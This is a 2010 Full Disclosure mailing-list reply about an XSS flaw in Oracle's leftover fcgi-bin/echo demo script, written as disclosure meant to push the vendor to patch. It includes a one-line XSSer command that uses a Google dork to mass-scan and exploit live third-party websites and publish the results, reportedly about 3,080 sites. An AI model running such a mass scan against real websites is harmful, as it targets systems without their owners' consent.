|
Full Disclosure
mailing list archives
Re: XSS in Oracle default fcgi-bin/echo
From: psy <root () lordepsylon net>
Date: Fri, 08 Oct 2010 16:16:47 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Maybe with a FD poc they decide to fix it.
Detecting, exploiting and reporting "fcgi-bin/echo" Oracle vulnerability
with XSSer (http://xsser.sf.net)
./XSSer -d "'inurl:fcgi-bin/echo'" --De "google" --proxy
"http://127.0.0.1:8118"; -s --publish
Results of the botnet attack in real time:
http://identi.ca/xsserbot01
http://twitter.com/xsserbot01
Reported: apróx 3.080 websites vulnerables.
psy.
Paul, list,
On 10/08/2010 12:18 AM, paul.szabo () sydney edu au wrote:
Many Oracle web server installations have a fcgi-bin/echo script
left over from default demo (google for inurl:fcgi-bin/echo). That
script seems vulnerable to XSS. (PoC exploit and explanation of
impact withheld now.)
I asked security () oracle com and they said that "... this issue has
been resolved in an earlier Critical Patch Update."
They said the same to me one year ago.
regards,
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEARECAAYFAkyvJv0ACgkQdaGdezyqJbO3LwCfRNPR0yp0Bcs2U/zGp0MrZup+
t4QAn0/E91Ly9Ilv/VkODBg7zCuy9rlD
=YzKR
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
Re: XSS in Oracle default fcgi-bin/echo sumit kumar soni (Oct 14)
| 
